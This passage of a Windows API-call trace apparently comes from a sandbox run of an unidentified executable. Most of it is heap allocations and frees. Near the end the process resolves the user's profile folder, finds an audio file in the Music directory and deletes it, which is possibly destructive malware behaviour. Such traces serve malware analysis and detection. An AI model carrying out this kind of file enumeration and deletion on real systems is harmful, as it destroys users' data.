lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0254.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0254.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0254.063] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0254.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0254.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa358 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0254.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa90 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0254.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.065] CloseHandle (hObject=0x2a0) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.073] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0254.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0254.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0254.074] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0254.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0254.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0254.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0254.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.074] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.074] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0254.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0254.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0254.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0254.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0254.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0254.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0254.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0254.077] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0254.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0254.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0254.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0254.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0254.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0254.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0254.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0254.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0254.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0254.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0254.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0254.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0254.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0254.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0254.087] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0254.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0254.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0254.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0254.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0254.088] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0254.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.088] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0254.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0254.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0254.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0254.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0254.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0254.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0254.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0254.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0254.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0254.090] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a", lpFilePart=0x8bedfc*="xBQp6dTr52cBE6l-Un.m4a") returned 0x3a [0254.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0254.090] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xbqp6dtr52cbe6l-un.m4a")) returned 0x20 [0254.091] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33778d30, ftCreationTime.dwHighDateTime=0x1d4c59c, ftLastAccessTime.dwLowDateTime=0x5cdbd2b0, ftLastAccessTime.dwHighDateTime=0x1d4d41c, ftLastWriteTime.dwLowDateTime=0x5cdbd2b0, ftLastWriteTime.dwHighDateTime=0x1d4d41c, nFileSizeHigh=0x0, nFileSizeLow=0x16f0, dwReserved0=0x1443, dwReserved1=0x4, cFileName="xBQp6dTr52cBE6l-Un.m4a", cAlternateFileName="XBQP6D~1.M4A")) returned 0xaa59a0 [0254.093] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xBQp6dTr52cBE6l-Un.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xbqp6dtr52cbe6l-un.m4a")) returned 1 [0254.119] FindNextFileW (in: hFindFile=0xaa59a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33778d30, ftCreationTime.dwHighDateTime=0x1d4c59c, ftLastAccessTime.dwLowDateTime=0x5cdbd2b0, ftLastAccessTime.dwHighDateTime=0x1d4d41c, ftLastWriteTime.dwLowDateTime=0x5cdbd2b0, ftLastWriteTime.dwHighDateTime=0x1d4d41c, nFileSizeHigh=0x0, nFileSizeLow=0x16f0, dwReserved0=0x1443, dwReserved1=0x4, cFileName="xBQp6dTr52cBE6l-Un.m4a", cAlternateFileName="XBQP6D~1.M4A")) returned 0 [0254.119] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0254.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0254.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0254.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0254.119] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0254.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0254.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0254.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0254.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0254.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0254.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0254.120] RtlAllocateHeap (HeapHandle=0x25c0000, 